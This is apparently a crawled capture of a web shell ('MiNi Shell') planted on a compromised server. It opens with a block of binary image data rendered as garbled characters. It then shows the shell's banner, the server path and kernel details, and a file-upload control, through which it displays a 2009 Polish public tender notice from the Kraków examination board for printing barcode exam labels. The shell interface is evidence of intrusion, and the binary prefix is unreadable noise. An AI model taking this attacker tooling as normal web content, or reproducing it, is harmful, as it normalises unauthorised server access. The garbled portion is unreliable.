JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090209/22202-N-2009.html

<p class="kh_header"><b>Kraków: Druk, konfekcjonowanie i dostawa etykiet samoprzylepnych z kodami kreskowymi do celów identyfikacyjnych arkuszy egzaminacyjnych w egzaminach przeprowadzanych w 2009 r. przez OKE w Krakowie</b><br>
<b>Numer ogłoszenia: 22202 - 2009; data zamieszczenia: 09.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Okręgowa Komisja Egzaminacyjna w Krakowie , al. marsz. Ferdinanda Focha 39, 30-119 Kraków, woj. małopolskie, tel. 012 6181201, 202, 203, faks 012 6181200.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www,oke.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka budżetowa nadzorowana przez MEN, utworzona na podstawie Ustawy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Druk, konfekcjonowanie i dostawa etykiet samoprzylepnych z kodami kreskowymi do celów identyfikacyjnych arkuszy egzaminacyjnych w egzaminach przeprowadzanych w 2009 r. przez OKE w Krakowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest druk, konfekcjonowanie i dostawa na miejsce wskazane przez OKE w Krakowie, ok. 4134000 szt. różnych spersonalizowanych etykiet samoprzylepnych z kodami kreskowymi do celów identyfikacyjnych arkuszy egzaminacyjnych w egzaminach przeprowadzanych na terenie objętym działaniem OKE w Krakowie w 2009 r.  
Numer i odpowiadający mu kod kreskowy powinien być wydrukowany na papierowych, półmatowych etykietach samoprzylepnych, na drukarkach termo transferowych o rozdzielczości 300 dpi lub równoważnych, zapewniających trwałość i jakość nadruku odpowiednią dla późniejszego skanowania.
Dla uzyskania pewności dobrej jakości druku, pozwalającego na bezbłędny odczyt kodu przez skanery, należy zastosować urządzenia do weryfikacji poprawności wydruku kodu kreskowego na etapie wykonania.
Zamawiający sugeruje wykonanie druku etykiet w trzech rzędach na arkuszach. 

Zakres zamówienia obejmuje druk konfekcjonowanie i dostawę etykiet kodowych dla podanych niżej akcji:

1.	AKCJA SPRAWDZIAN 
Druk konfekcjonowanie i dostawa etykiet samoprzylepnych z nadrukiem kodu kreskowego: 
1.1. Dla 88 000 uczniów: etykiety o wymiarach 5 x 4 cm na arkuszach, po 3 szt. w tym:
- 1 etykieta z imieniem, nazwiskiem i numerem PESEL zdającego,
- 2 etykiety z kodem numerycznym szkoły zdającego, numerem PESEL i kodem ucznia oraz odpowiadającymi im kodami kreskowymi,
1.2. Dla 3355 szkół: etykiety o wymiarach 5 x 4 cm na osobnych arkuszach po 42 szt., 
w tym:
- 1 etykieta z ujawnionymi danymi identyfikującymi szkołę,
- 41 etykiet z kodem numerycznym szkoły i odpowiadającym mu kodem kreskowym. 
1.3. Ok. 3355 szt. etykiet adresowych szkół o wymiarach 8 x 6 cm do naklejania na koperty zawierające wyżej opisane etykiety. 

2.	AKCJA GIMNAZJUM
Druk konfekcjonowanie i dostawa etykiet samoprzylepnych z nadrukiem kodu kreskowego: 
2.1.Dla 100 000 uczniów etykiety o wymiarach 5 x 4 cm na arkuszach, po 9 szt., które otrzyma każdy  z ok. 100 000  uczniów przystępujących do 3 części egzaminu gimnazjalnego  w tym:
- 1 etykieta z imieniem, nazwiskiem i numerem PESEL zdającego,
- 8 etykiet z kodem numerycznym szkoły zdającego, numerem PESEL i kodem ucznia oraz odpowiadającymi im kodami kreskowymi,
2.2. Dla 1714 szkół etykiety o wymiarach 5 x 4 cm na osobnych arkuszach po 42 szt., w tym:
- 1 etykieta z ujawnionymi danymi identyfikującymi szkołę,
- 41 etykiet z kodem numerycznym szkoły i odpowiadającym mu kodem kreskowym. 
2.3. Ok. 1714 szt. etykiet adresowych szkół o wymiarach 8 x 6 cm do naklejania na koperty zawierające wyżej opisane etykiety. 

Konfekcjonowanie i dostawa etykiet dla akcji z poz. 1 i 2:
Arkusze etykiet, oddzielnie dla każdej ze szkół i jej uczniów pakowane będą do kopert a koperty do pudeł zbiorczych zaadresowanych do wskazanych przez Zamawiającego miejsc odbioru  - ok. 67 miejsc na terenie  województw małopolskiego, lubelskiego i podkarpackiego.
Pudła z kopertami Wykonawca dostarcza na swój koszt w terminie wykonania zamówienia.
 
3.		AKCJA MATURA 
Druk konfekcjonowanie i dostawa etykiet samoprzylepnych z nadrukami kodu kreskowego: 
3.1. Dla 92 000 uczniów etykiety o wymiarach 5 x 4 cm na arkuszach, po 21 szt., w tym:
- 1 etykieta z imieniem, nazwiskiem i numerem PESEL zdającego,
- 20 etykiet z kodem numerycznym szkoły zdającego, numerem PESEL i kodem ucznia oraz odpowiadającymi im kodami kreskowymi,,
3.2. Dla 1469 szkół etykiety o wymiarach 5 x 4 cm na osobnych arkuszach po 105 szt., w tym:
- 1 etykieta z ujawnionymi danymi identyfikującymi szkołę,
- 104 etykiety z kodem numerycznym szkoły i odpowiadającym mu kodem kreskowym. 
3.3.	Ok. 1469 szt. etykiet adresowych szkół o wymiarach 8 x 6 cm do naklejania na koperty zawierające wyżej opisane etykiety. 

Konfekcjonowanie etykiet dla akcji z poz. 3:
Arkusze etykiet, oddzielnie dla każdej ze szkół i jej uczniów pakowane będą do kopert a koperty do pudeł zbiorczych zaadresowanych do wskazanych przez Zamawiającego miejsc odbioru  - ok. 61 miejsc na terenie województw małopolskiego, lubelskiego i podkarpackiego.
Pudła z kopertami Wykonawca dostarcza na swój koszt w terminie wykonania zamówienia.

4.	AKCJA EGZAMIN ZAWODOWY     
Druk konfekcjonowanie i dostawa etykiet samoprzylepnych z nadrukami kodu kreskowego dla etapu pisemnego i praktycznego egzaminu:

4.1. Dla uczniów: ok. 549 000 szt. etykiet o wymiarach 5 x 4 cm na arkuszach:
- po 3 szt., dla etapu pisemnego egzaminu w tym:
- 1 etykieta z imieniem i nazwiskiem zdającego, nr PESEL, i numerem kodu zawodu (dane zdającego ujawnione)
- 2 szt. z kodem numerycznym szkoły, numerem PESEL z numerem kodu zawodu oraz odpowiadającymi im kodami kreskowymi.
- po 6 szt. dla etapu praktycznego egzaminu w tym:
- 1 etykieta z imieniem i nazwiskiem zdającego, nr PESEL, i numerem kodu zawodu (dane zdającego ujawnione)
- 5 szt. z kodem numerycznym ośrodka, numerem PESEL z numerem kodu zawodu oraz odpowiadającymi im kodami kreskowymi,
które otrzyma każdy z ok. 61000 uczniów w 5220 szkołach zawodowych albo ośrodkach egzaminacyjnych przystępujący do egzaminu pisemnego i praktycznego. 
4.2. Dla szkół i ośrodków: ok. 109620 szt. etykiet o wymiarach 5 x 4 cm na osobnych arkuszach po, 21 szt., które przeznaczone są dla dyrekcji szkół. Każdy z ok. 5220 arkuszy zawierać będzie etykiety, z  numerem i kodem kreskowym szkoły lub ośrodka w tym:
- 1 etykieta z ujawnionymi danymi identyfikującymi szkołę,
- 20 etykiet z kodem numerycznym szkoły i odpowiadającym mu kodem kreskowym.

4.3. Ok. 5220 szt. etykiet adresowych szkół o wymiarach 8 x 6 cm do naklejania na koperty 
z zawartością etykiet, opisanych wyżej.

Konfekcjonowanie etykiet dla akcji z poz. 4:
Arkusze etykiet, dla ucznia i szkoły należy zapakować do kopert jednolitego formatu, dla każdej ze szkół oddzielnie i oznaczyć dodatkową etykietą (wydrukowaną jako ostatnia 
z etykiet kodowych danej szkoły, ale o formacie 8 x 6 cm). Całość materiałów tego zadania zapakowana do pudeł (dobór i zakup pudeł należy do Wykonawcy zamówienia) dostarczona zostanie do wskazanych przez Zamawiającego miejsc (biuro OKE, os. Szkolne 37) w terminie jak niżej. 


Termin wykonania zamówienia dla każdej z akcji, oznacza termin, w którym dostarczone etykiety będą wydawane dla szkół przez pracowników Zamawiającego w jego biurach, magazynach lub innych wskazanych przez niego miejscach (Punkty Odbioru Prac na terenie 3 województw).
       
W ramach niniejszego zamówienia Wykonawca zobowiązany będzie - o ile zaistnieje taka potrzeba do dodruku etykiet kodowych przeznaczonych dla uczniów przystępujących do egzaminów w II terminie, jak również do dodruku brakujących etykiet ujawnionych po terminie ich dostawy.
W przypadku jakichkolwiek uchybień w wykonaniu zamówienia, które skutkowałyby zakłóceniem toku egzaminów przeprowadzanych z użyciem opisanych wyżej etykiet kodowych, Zamawiający zastrzega sobie możliwość nałożenia na Wykonawcę kar umownych w wysokości określonej w projekcie umowy zamieszczonym w SIWZ.

Wykonawca zobowiązany jest do przestrzegania obowiązujących przepisów prawa 
w zakresie ochrony danych osobowych i niewykorzystywania uzyskanej od Zamawiającego bazy danych do innych celów niż wydruk etykiet kodowych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.19.97.61-2, 79.82.30.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 15.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia publicznego mogą ubiegać się wyłącznie Wykonawcy, którzy:
1.1.	złożyli ofertę odpowiadającą zasadom określonym w ustawie - Prawo zamówień publicznych i spełniają wymagania określone w niniejszej SIWZ, 
1.2.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
1.3.	posiadają niezbędna wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,
1.4.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
1.5.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 ust. 1 i 2 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z dnia 9 lutego nr 19, poz. 177),
1.6. oraz w szczególności :
a)	dysponują potencjałem technicznym i osobami do uzyskania zdolności technicznej do druku i konfekcjonowania etykiet z kodem kreskowym w ilościach umożliwiających realizację zamówienia dla poz. 1 i 2 opisu - akcja SPRAWDZIAN i GIMNAZJUM - w terminie 6 dni (ok. 60 000 etykiet na jedna zmianę), 
b)	wskażą odbiorców minimum 3 usług w okresie ostatnich 3 lat, lub w okresie prowadzenia działalności gospodarczej, o ile jest on krótszy niż 3 lata, tożsamych z przedmiotem niniejszego zamówienia, przy uzyskaniu przychodu ze świadczenia takich usług w podanej łącznie wysokości: 60 000 zł brutto w tym okresie (np. rocznie po 20 000 zł),a także, dostarczą wraz z ofertą, określone w SIWZ dokumenty i oświadczenia, na potwierdzenie spełnienia tych warunków.
Ocena spełnienia warunków w postępowaniu o zamówienie publiczne
2. Ocena spełnienia wymaganych warunków udziału w postępowaniu dokonywana będzie metodą spełnia - nie spełnia w oparciu o dostarczone w ofercie dokumenty i oświadczenia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Wypełniony Formularz ofertowy zawierający wymaganą do ważności oferty treść wg wzoru przedstawionego w załączniku nr 1 do SIWZ wraz z załącznikiem nr 2 - Formularzem cenowym, który należy poprawnie wyliczyć. 
2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji gospodarczej, wystawiony/e nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (kserokopia potwierdzona przez osobę uprawnioną do podpisywania oferty z dopiskiem -za zgodność z oryginałem). 
3.	Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę (w formie oryginału, lub kopii poświadczonej przez notariusza za zgodność z oryginałem), - jeżeli jest wymagane.
4.	Oświadczenie o spełnieniu warunków udziału w postępowaniu wg załącznika nr 6 do SIWZ. 
5.	Zaświadczenia lub oświadczenie - wg wzoru z załącznika nr 7 do SIWZ, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenia zdrowotne lub społeczne.
6.	Wypełniony Wykaz informacji (załącznik nr 4 do SIWZ) dla udokumentowania spełnienia warunku posiadania zdolności do wykonania zamówienia zawierający opis posiadanego potencjału technicznego i posiadanych zasobów ludzkich oraz wykaz wykonanych minimum 3 dostaw (wykazywać nie więcej jak 5) w okresie ostatnich 3 lat, lub w okresie prowadzenia działalności gospodarczej, o ile jest on krótszy niż 3 lata, odpowiadających swoim rodzajem 
i wartością dostawom stanowiącym przedmiot niniejszego zamówienia, przy uzyskaniu przychodu z realizacji takich dostaw w podanej łącznie wysokości: 60 000 zł brutto w tym okresie (np. rocznie po 20 000 zł).
7.	Zaparafowany projekt umowy, uzupełniony danymi dot. Wykonawcy (załącznik nr 3 do SIWZ).
8.	Pisemne zobowiązanie innych podmiotów do udostępnieniu Wykonawcy potencjału technicznego i osób zdolnych do wykonania zamówienia, jeżeli jest wymagane..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.oke.krakow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Okręgowa Komisja Egzaminacyjna w Krakowie
Al. Focha 39, 30-119 Kraków.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.02.2009 godzina 12:00, miejsce: Okręgowa Komisja Egzaminacyjna w Krakowie
Al. Focha 39, 30-119 Kraków.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com